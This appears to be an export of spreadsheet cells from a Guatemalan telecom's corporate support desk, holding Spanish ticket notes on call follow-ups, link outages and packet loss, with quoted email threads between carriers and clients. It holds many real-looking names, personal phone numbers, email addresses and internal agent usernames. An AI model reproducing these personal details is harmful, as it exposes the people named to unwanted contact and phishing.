    <t>--- SE LLAMA AL NUMERO 56329147, SE CONSULTA POR IVAN CORADO, INDICA QUE ESTA EQUIVOCADO. ...
RESULTADO: LLAMADA HECHA
NOMBRE: 56329147
NÚMERO: 56329147
INICIO: HOY, 10:32
FIN: HOY, 10:32
DURACIÓN: 0:24
ID DE LLAMADA: 2001595850
...</t>
  </si>
  <si>
    <t>--- WILLIAM MONTERROSO 58595226 (CLIENTE), INDICA QUE SE ENCUENTRAN REALIZANDO PRUEBAS DEBIDO A QUE TAMBIEN REPORTARON UN E-1 QUE TIENEN EN LA PEDRERA Y VISITARON EL SITIO, SOLICITA QUE SE LE LLAME MAÑANA A LAS 9:00 HRS. ...
RESULTADO: LLAMADA HECHA
NOMBRE: 58595226
NÚMERO: 58595226
INICIO: HOY, 13:54
FIN: HOY, 13:56
DURACIÓN: 1:57
ID DE LLAMADA: 2001641902
...</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE IVAN CORADO, PERO NO CONTESTA. SE DARA SEGUIMIENTO EL DIA LUNES.
SE APLICO UN RESET A LAS TRONCALES DEL CLIENTE.
2001541991,2001542373, 2001542407
COLA:
NOMBRE: A: 42106628
NÚMERO: 42106628
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: 42106628
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 10/06/2022 18:14:44</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE IVAN QUIEN ESTA ENTERADO DE LAS PRUEBAS Y REVISARAN DE MANERA INTERNA. SE PROCEDE AL CIERRE.
3001096999
COLA:
NOMBRE: A: 59223764
NÚMERO: 59223764
DURACIÓN: 0:00:05
ESTADO: MARCANDO
DETALLES: 59223764
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 11:42:34</t>
  </si>
  <si>
    <t>F4597607</t>
  </si>
  <si>
    <t>SE ESTÁN HACIENDO PRUEBAS DE LLAMADAS A LA EXTENSIÓN 6741 CON CLIENTE WILLIAMS MONTERROSO, CLIENTE ESCUCHA FUERTE Y CLARO, SE CONTINÚA EN PRUEBAS. ID:2001579876</t>
  </si>
  <si>
    <t>SE REALIZARON PRUEBAS DE LLAMADAS POR 30 MINUTOS Y LLAMADAS SE ESCUCHAN CLARO Y SIN RUIDO EN AMBOS SENTIDOS, PRUEBAS SE REALIZARON CON APOYO DE CLIENTE WILLIAM MONTERROSO QUIEN VALIDA EL SERVICIO.
SE DA CODIGO DE CIERRE EN ETA
2001579876
COLA:
NOMBRE: A: 58261265
NÚMERO: 58261265
DURACIÓN: 1:09:06
ESTADO: CONECTADA
DETALLES: 58261265
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 11/06/2022 10:35:43 A. M.</t>
  </si>
  <si>
    <t>F4597618</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LOURDES LOPEZ AL 31578251 CONTESTA EL SEÑOR ELIO SUAZO INDICA QUE ESTAN REALIZANDO PRUEBAS PERO AL CONECTARSE REMOTAMENTE LE DA 24 MEGAS Y SI SE CONECTA CON EL CABLE LE DA 50 MEGAS || SE NOTIFICA A GESTOR **
-ID 2001790976
**
**</t>
  </si>
  <si>
    <t>SE CONVERS CON CLIENTE  LOURDES LOPEZ, INDICA QUE EL DIA DE HOY, NO SE ENCUENTRAN LABORANDO Y QUE SE DARA SIGUIMIENTO VIA CORREO EL DIA DE MAÑANA A PARTIR DE LAS 8:00 HORAS.
2001724247
COLA:
NOMBRE: A: 0050431578251
NÚMERO: 0050431578251
DURACIÓN: 0:01:06
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050431578251
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 12/06/2022 11:45:40</t>
  </si>
  <si>
    <t>F4597621</t>
  </si>
  <si>
    <t>CLIENTE ESTUARDO PEDRO GARCIA LLAMA DEL 42869628 ID 2001562727 PARA EL SEGUIMIENTO DEL CASO SD1134138 SE LE INFORMA QUE SERA TRANSFERIDO PARA EL APOYO, SE TRANSFIERE CON EL GESTOR A CARGO EVELYN AL 8126 ID 2001562909 ATIENDE JOSE OCHOA Y TRANSFIERE CON NICOLAS QUIEN LO ASIGNAN EN EL MOMENTO PARA EL SEGUIMIENTO Y NO RESPONDE SE LE LLAMA A LA EXT 5483 ID 2001563086 NO RESPONDE SE ESCALA CON JUAN MANUEL CARDONA AL 41287321 ID 2001563225 SE LE COMENTA Y HACE LA TRANSFERENCIA EN LINEA CON EL GESTOR Y SE DEJA CON EL CL EN LINEA. A LA ESPERA DE LOS AVANCES.</t>
  </si>
  <si>
    <t>SE INTENTA CONTACTAR A CLIENTE PERO NO SE TIENE RESPUESTA
2001568576
COLA:
NOMBRE: A: 50422360100
NÚMERO: 50422360100
DURACIÓN: 0:00:33
ESTADO: CONECTADA
DETALLES: 50422360100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 11/06/2022 08:31:20</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PEDRO SE LE COMENTA  EL TIEMPO ESTIMADO DEL TECNICO QUEDA ENTERADO
2001567395
COLA:
NOMBRE: A: 42869628
NÚMERO: 42869628
DURACIÓN: 0:01:04
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42869628
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 11/06/2022 08:25:20</t>
  </si>
  <si>
    <t>F4597628</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A VÍCTOR LÓPEZ/CLIENTE; SE LE INDICA QUE SE LLAMARÁ EN 15/20 MINUTOS A PR PARA CONTINUAR CON SEGUIMIENTO DEL TICKET.</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE AUTORIZANDO EL CIERRE DEL TICKET:
DE: LUIS CHEN [MAILTO:LUISCHEN@ICASA.COM.GT]
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 16:56
ASUNTO: RE: VALIDACIÓN SERVICIO 97100279T || PRONE || SD1134141
BUEN DÍA
EL ENLACE SE ENCUENTRA OPERATIVO, PUEDEN PROCEDER AL CIERRE DEL TICKET, GRACIAS.
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>--- SE LE INFORMA A VICTOR LOPEZ 31615244 (CLIENTE) QUE EL CORREO FUE ENVIADO, INDICA QUE REVISARA Y RESPONDERA EN UNOS MINUTOS POR LA MISMA VIA, DE NO TENER RESPUESTA SE LE LOCALIZARA DE NUEVO A LAS 10:45 HRS. ...
RESULTADO: LLAMADA HECHA
NOMBRE: 31615244
NÚMERO: 31615244
INICIO: HOY, 10:14
FIN: HOY, 10:15
DURACIÓN: 0:40
ID DE LLAMADA: 2001591101
...</t>
  </si>
  <si>
    <t>F4597673</t>
  </si>
  <si>
    <t>SE HABLÓ CON RAÚL HERNÁNDEZ/CLIENTE 00 525551745299 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4597677</t>
  </si>
  <si>
    <t>SE HABLÓ CON GILBERTO ROMANO/CLIENTE 00 525551745299 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4597683</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE CARLOS MARIO QUIEN INDICA QUE ESTABA PERCIBIENDO LLAMADAS ENTRE CORTADAS Y PERDIDA DE AUDIO.
EN ESTE MOMENTO INDICA QUE NO SE ESTA PRESENTANDO LA AFECTACION. SOLCITA QUE SE LLAME MAÑANA A LAS 12:00PM PARA VERIFICAR SI EL PROBLEMA SE DIO NUEVAMENTE.
2001551773, 2001551817, 2001551833
COLA:
NOMBRE: A: 0050377418007
NÚMERO: 0050377418007
DURACIÓN: 0:00:25
ESTADO: MARCANDO
DETALLES: 0050377418007
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 10/06/2022 19:58:03</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MARIO VALLE 77418007 QUIEN VALIDA QUE EL SERVICIO YA NO HA PRESENTADO INCONVENIENTES, AUTORIZA EL CIERRE DEL CASO. ID:2001622643</t>
  </si>
  <si>
    <t>F4597726</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 20:55
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;
ASUNTO: RE: FALLA ENLACE RANCHERO 902_829800012T
BUENAS TARDES ESTIMADOS (A)
COMO PARTE DEL SEGUIMIENTO AL CASO 829800012T, SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES PLANTEADOS. POR NUESTRA PARTE SE ALCANZA EL SERVICIO Y SE VALIDA COMUNICACIÓN HACIA CENTRAL. QUEDAMOS AL PENDIENTE. GRACIAS DE ANTEMANO.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA VALIDAR -*-*-*
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 04:22
PARA: JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE RANCHERO 902_829800012T
BUENOS DÍAS ESTIMADO SR. SIERRA.
                DE NUESTRO LADO SE CONTINUA OBSERVANDO OPERATIVIDAD EN EL SERVICIO.
PODRÍA APOYARNOS EN VALIDAR EL FUNCIONAMIENTO ACTUAL DESDE SU LADO E INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4597754</t>
  </si>
  <si>
    <t>F4597784</t>
  </si>
  <si>
    <t>--- LUIS PAREDES 1755 EXT. 60010 (CLIENTE), INDICA QUE HACE 10 MIN. SALIO Y NO OBSERVO CORREO, SE ENVIA EN EL HILO DE MAIL QUE ORIGINO EL CLIENTE, REVISARA Y SOLICITA QUE SE LE LLAME EN 30 MIN. ...
RESULTADO: LLAMADA HECHA
NOMBRE: 1755
NÚMERO: 24102600
INICIO: HOY, 13:46
FIN: HOY, 13:49
DURACIÓN: 2:46
ID DE LLAMADA: 2001640451
DE: DIEGO PABLO AJIN HERNANDEZ
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 13:53
PARA: LUIS A. PAREDES (ATI DE TELECOMUNICACIONES Y SEGURIDAD TI) &lt;LUIS_PAREDESF@BANTRAB.NET.GT&gt;
CC: REDES Y SEGURIDAD TI &lt;REDESYSEGURIDADTI@BANTRAB.NET.GT&gt;; ELFEGO LEONEL DIAZ MENDOZA &lt;ELFEGO.DIAZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: CERTIFICACION DE ENLACE
LUIS.
                SEGÚN LO CONVERSADO VÍA TELEFÓNICA, ADJUNTO CORREO COMPARTIDO POR PARTE DE CNOC CA.
...</t>
  </si>
  <si>
    <t>F4597814</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO ROBERTO MONZON AL 2428-0092  CONTESTA EL SEÑOR FERNANDO DE LEON QUIEN CONFIRMA SERVICIO ESTABLE Y OPERATIVO AUTORIZA CIERRE DE TICKET **
ID 2001805389
**</t>
  </si>
  <si>
    <t>SE ENVIA PRUEBAS DE TRAZADO EN DONDE SE OBSERVA LIBERACION DE PARTE DE LA PBX, A LA ESPERA DE LA RESPUESTA DE PARTE DEL CLIENTE
TICKET 26356076 - FALLA DATOS / DATA SERVICE OUTAGE - GTUS00537901 || TKT CLARO: 90405 NÚMERO +502 2386-5800
MONICA YIREH CASTILLO POON
BUENOS DÍAS ESTIMADOS,
LE COMENTAMOS QUE YA SE HAN FINALIZADO LAS PRUEBAS CON EL ÁREA DE CONMUTACIÓN, EL SERVICIO SE ENCUENTRA OPERATIVO A NIVEL DE CENTRAL, SIN EMBARGO, SE REALIZARON PRUEBAS DE TRAZADO EN DONDE SE OBSERVA LA LIBERACIÓN DE LLAMADA POR PARTE DE LA PLANTA TELEFÓNICA.
ADJUNTAMOS TRAZADO, FAVOR SU APOYO DESCARTANDO PROBLEMAS A NIVEL DE CONFIGURACIÓN CON LA PLANTA.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS,</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL  SOLICITANDO AVANCES ADICIONALES --*-*
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 02:19
PARA: TIGO SUPPORT &lt;SUPPORT@TIGO.COM.GT&gt;; ACCESOS EMPRESARIALES &lt;ACCESOSEMPRESARIALES@CLARO.COM.GT&gt;
CC: GUSTAVO ADOLFO ORDOÑEZ AGUSTIN &lt;GORDONEZ@TIGO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; OSCAR DANIEL GIRON REYES &lt;OSCAR.GIRON@CLARO.COM.GT&gt;; BYRON OTONIEL RAMIREZ GUTIERREZ &lt;BYRONRAMIREZ@TIGO.COM.GT&gt;; OLIVER ESTUARDO ZEPEDA MOSCOSO &lt;OZEPEDA@TIGO.COM.GT&gt;; JULIO ROBERTO MONZON PEÑALONZO &lt;JMONZONP@TIGO.COM.GT&gt;; OSCAR ESTUARDO RAMIREZ RAMIREZ &lt;ORAMIREZR@TIGO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; HECTOR LEONEL COS PIRIR &lt;HECTOR.COS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: TICKET 26356076 - FALLA DATOS / DATA SERVICE OUTAGE - GTUS00537901 || TKT CLARO: 90405 NÚMERO +502 2386-5800
BUENOS DÍAS ESTIMADO SR. OLIVER.
                LAMENTAMOS LOS INCONVENIENTES, SE SOLICITÓ APOYO AL PERSONAL DE ACCESOS EMPRESARIALES PARA AGILIZAR REVISIONES YA QUE DE MOMENTO SE OBSERVAN LAS TRONCALES LIBRES .
ESPERAMOS COMPARTIR AVANCES A LA BREVEDAD POSIBLE SOBRE LAS REVISIONES ADICIONALES QUE REALIZAN.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: TIGO SUPPORT [MAILTO:SUPPORT@TIGO.COM.GT]
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 02:08
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JULIO ROBERTO MONZON PEÑALONZO &lt;JMONZONP@TIGO.COM.GT&gt;; OLIVER ESTUARDO ZEPEDA MOSCOSO &lt;OZEPEDA@TIGO.COM.GT&gt;; BYRON OTONIEL RAMIREZ GUTIERREZ &lt;BYRONRAMIREZ@TIGO.COM.GT&gt;; HECTOR LEONEL COS PIRIR &lt;HECTOR.COS@CLARO.COM.GT&gt;; OSCAR DANIEL GIRON REYES &lt;OSCAR.GIRON@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; OSCAR ESTUARDO RAMIREZ RAMIREZ &lt;ORAMIREZR@TIGO.COM.GT&gt;
CC: GUSTAVO ADOLFO ORDOÑEZ AGUSTIN &lt;GORDONEZ@TIGO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: TICKET 26356076 - FALLA DATOS / DATA SERVICE OUTAGE - GTUS00537901 || TKT CLARO: 90405 NÚMERO +502 2386-5800
ESTIMADOS,
POR FAVOR PROVEER UN NUEVO UPDATE, ESTE CASO LLEVA MÁS DE 48 HORAS.
SALUDOS / BEST REGARDS</t>
  </si>
  <si>
    <t>F4597827</t>
  </si>
  <si>
    <t>***--- SE HABLA CON ROGER RODRIGUEZ (CLIENTE) SE LE INIDDICA D ELO DETERMINADO Y CL COMENTA QUE CONSIDERA EXTRAÑO ESTE DIAGNOSTICO PORQUE ELLOS TIENEN UPS Y NO SE PRESENTO NINGUNA FALLA EN SITIO. ---**  ADICIONAL SOLICITA SE LE ENVÍE ESTA MISMA INFORMACIÓN VÍA MAIL --**</t>
  </si>
  <si>
    <t>F4597857</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL SOLICITANDO CONTACTOS EN SITIO --+**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 03:07
PARA: TREJO GUTIERREZ ANGEL &lt;TGANGEL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL IP2130013::: TICKET CNOC IMVOL007930::: "FUERA DE SERVICIO"
ESTIMADO SR. TREJO.
                CONTINUANDO CON EL SEGUIMIENTO, PERSONAL A CARGO NOS INDICA QUE ES NECESARIO REALIZAR PRUEBAS CON LOS EQUIPOS EN SITIO.
PODRÍA POYARNOS EN INDICAR CONTACTOS LOCALES PARA CONTINUAR CON DICHAS PRUEBAS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4597871</t>
  </si>
  <si>
    <t>***---  SE RESPONDE CORREO A CL E INDICA QUE VALIDARA CON SU CLIENTE FINAL --*-*
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 02:40
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;
ASUNTO: RE: OPEN TICKET REQUEST // CUSTOMER: HUAWEI // COUNTRY: GUATEMALA // TIWS TT: INC000003765726 // PROVIDER TT: ??? // PROBLEM: PÉRDIDA DE PAQUETES //
ESTIMADO SR. GÓMEZ.
                PERSONAL A CARGO NOS INDICA QUE NO REALIZÓ NINGUNA ACCIÓN Y TAMPOCO SE OBSERVA ALGÚN EVENTO EN AMBOS ENLACES.
QUEDAMOS AL PENDIENTE DE LA CONFIRMACIÓN DEL CLIENTE FINAL.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SMC RECOVERY EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 02:35
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: OPEN TICKET REQUEST // CUSTOMER: HUAWEI // COUNTRY: GUATEMALA // TIWS TT: INC000003765726 // PROVIDER TT: ??? // PROBLEM: PÉRDIDA DE PAQUETES //
ESTIMADOS,
ESTAMOS CONFIRMANDO CON CLIENTE. ¿ HABEIS REALIZADO ALGUNA ACCIÓN ?
UN SALUDO
JOSÉ LUIS GÓMEZ ROJO
CUSTOMER OP. &amp; TECH ¿ INCIDENT MANAGEMENT NETWORKING EMEA
TELEFÓNICA GLOBAL SOLUTIONS | EXTERNAL CONSULTANT
FIX PHONE +34 917 697 640
EMAIL SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM</t>
  </si>
  <si>
    <t>***--- SE RECIBE CORREO DE CL INDICANDO QUE SE REVISE A MAYOR PROFUNDIDAD YA QUE PRESENTARON PERDIDAS DE HASTA EL 8% -*-**
DE: SMC RECOVERY EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 02:44
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: OPEN TICKET REQUEST // CUSTOMER: HUAWEI // COUNTRY: GUATEMALA // TIWS TT: INC000003765726 // PROVIDER TT: ??? // PROBLEM: PÉRDIDA DE PAQUETES //
BUENAS,
ENTENDEMOS PERO NOSOTROS CUANDO REVISAMOS POR NUESTRA CUENTA EN NUESTRA RED VIMOS PERDIDAS DE 2% AL 8% LAS MISMAS QUE VIO CLIENTE EN LAS IP WAN, POR FAVOR ES NECESARIO QUE REVISEN UN POCO MAS YA QUE FUERON BASTANTE NOTORIAS.
SALUDOS
ABRAHAM NAKFOUR
CUSTOMER OP. &amp; TECH ¿ INCIDENT MANAGEMENT NETWORKING EMEA | SHIFT LEADER
TELEFÓNICA GLOBAL SOLUTIONS | EXTERNAL CONSULTANT
FIX PHONE +34 917 697 640
EMAIL SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM</t>
  </si>
  <si>
    <t>F4597873</t>
  </si>
  <si>
    <t>--- SE RECIBE CORREO DEL CLIENTE, SE RESPONDE. ...
DE: DIEGO PABLO AJIN HERNANDEZ
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 10:06
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: OPEN TICKET REQUEST // CUSTOMER: HUAWEI // COUNTRY: GUATEMALA // TIWS TT: INC000003765726 // PROVIDER TT: 802800002 / SD1134175 /802800001 / SD1134176 // PROBLEM: PÉRDIDA DE PAQUETES //
MARIO.
                GRACIAS POR LA INFORMACION, LE COMENTO QUE LO COMPARTIDO POR PARTE DE GRUPO N1 ES SOBRE EL SIGUIENTE TICKET.
                SD1134175
                802800002
                10.192.1.206
                RESPECTO AL CASO
                SD1134176
                802800001
                10.192.1.210
                PODRÍA CONFIRMARNOS LA ESTABILIDAD.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
ATENTAMENTE:
DE: SMC RECOVERY EMEA BUSINESS SOLUTIONS [MAILTO:SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM]
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 09:52
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: OPEN TICKET REQUEST // CUSTOMER: HUAWEI // COUNTRY: GUATEMALA // TIWS TT: INC000003765726 // PROVIDER TT: 802800002 / SD1134175 /802800001 / SD1134176 // PROBLEM: PÉRDIDA DE PAQUETES //
ESTIMADOS,
NOSOTROS NO TENEMOS GESTIÓN DIRECTA DEL EQUIPO, POR LO QUE VAMOS A REVISARLO CON CLIENTE Y OS INFORMAMOS LO ANTES POSIBLE,
SALUDOS.
MARIO MACARRO
CUSTOMER OP. &amp; TECH ¿ INCIDENT MANAGEMENT NETWORKING EMEA
TELEFÓNICA GLOBAL SOLUTIONS | EXTERNAL CONSULTANT
FIX PHONE +34 917 697 640
EMAIL SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM
...</t>
  </si>
  <si>
    <t>--- SEGUIMIENTO POR CORREO. ...
DE: DIEGO PABLO AJIN HERNANDEZ
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 13:32
PARA: SMC RECOVERY EMEA BUSINESS SOLUTIONS &lt;SMC.RECOVERY.EMEA.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; LCE CARRIERS GLOBAL SOLUTIONS &lt;LCE.CARRIERS.GLOBALSOLUTIONS@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
